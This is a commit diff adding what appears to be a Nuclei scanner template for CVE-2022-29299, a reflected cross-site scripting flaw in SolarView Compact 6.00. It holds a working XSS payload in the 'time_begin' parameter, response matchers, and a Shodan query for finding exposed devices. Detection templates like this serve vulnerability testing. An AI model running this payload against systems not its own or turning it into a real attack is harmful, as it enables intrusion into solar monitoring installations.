Create CVE-2022-29299.yaml
parent
debc17529f
commit
b5434d582e
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2022-29299
|
||||
|
||||
info:
|
||||
name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
|
||||
author: For3stCo1d
|
||||
severity: medium
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50967
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:-244067125
|
||||
tags: cve,cve2022,xss,solarview
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue